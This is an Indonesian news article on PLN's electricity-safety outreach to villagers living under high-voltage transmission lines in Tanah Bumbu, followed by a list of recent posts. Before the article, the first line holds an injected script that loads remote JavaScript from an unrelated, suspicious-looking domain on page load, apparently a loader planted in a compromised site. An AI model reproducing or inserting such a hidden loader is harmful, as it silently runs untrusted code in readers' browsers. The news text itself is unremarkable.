(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PLN UIP3B KALIMANTAN

PLN Beri Pemahaman Keselamatan Ketenagalistrikan ke Warga Area Jaringan SUTT di Tanbu


KANALKALIMANTAN.COM, BATULICIN – PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan mengadakan sosialisasi tentang Keselamatan Ketenagalistrikan (K2) di Desa Banjarsari, Kecamatan Angsana, Tanah Bumbu, Kalimantan Selatan, pada Rabu (6/9/2023).

General Manager PLN UIP3B Kalimantan, Abdul Salam Nganro mengatakan, kegiatan ini dilakukan agar masyarakat dapat memahami potensi dan batasan area berbahaya di sekitar instalasi kelistrikan.

Ia mengajak seluruh pihak untuk bersama-sama menjaga aset negara demi kepentingan masyarakat khususnya di Kalimantan.

Baca juga: Menuju Sertifikasi Sekolah Internasional, Pemko Banjarbaru Jalin Kerjasama dengan Andrew’s College Cambridge

“Kami secara rutin melaksanakan kegiatan sosialisasi dan edukasi kepada masyarakat, terutama yang dekat dengan jaringan transmisi Saluran Udara Tegangan Tinggi (SUTT) 150 kV,” kata Salam.

Kegiatan sosialisasi dilakukan tim PLN Unit Pelaksana Transmisi Kalimantan Selatan dan Tengah (UPT Kalselteng) kepada warga.

Manajer PLN UPT Kalselteng Ivan Nur Pratama mengatakan, terdapat kegiatan-kegiatan masyarakat yang berpotensi mengganggu keandalan penyaluran tenaga listrik.

“Menanam pohon, bermain layangan dan menerbangkan balon udara di sekitar jaringan SUTT sangat berbahaya karena bisa menyebabkan listrik padam dan juga berbahaya untuk keselamatan masyarakat sendiri,” kata Ivan.

Ivan mengimbau apabila terdapat potensi bahaya, dimana benda asing seperti pohon atau lainnya yang menyentuh jaringan listrik agar bisa segera dilaporkan kepada PLN melalui aplikasi PLN Mobile yang dapat diunduh di playstore maupun appstore.

Hal ini diharapkan bisa meminimalisir angka kecelakaan pada Masyarakat umum yang diakibatkan oleh jaringan listrk PLN terutama pada jaringan SUTT 150kV. (Kanalkalimantan.com/adv)

Editor : kk


Muhammad Andi

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

5 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

6 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

7 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

8 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

11 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

14 jam ago

This website uses cookies.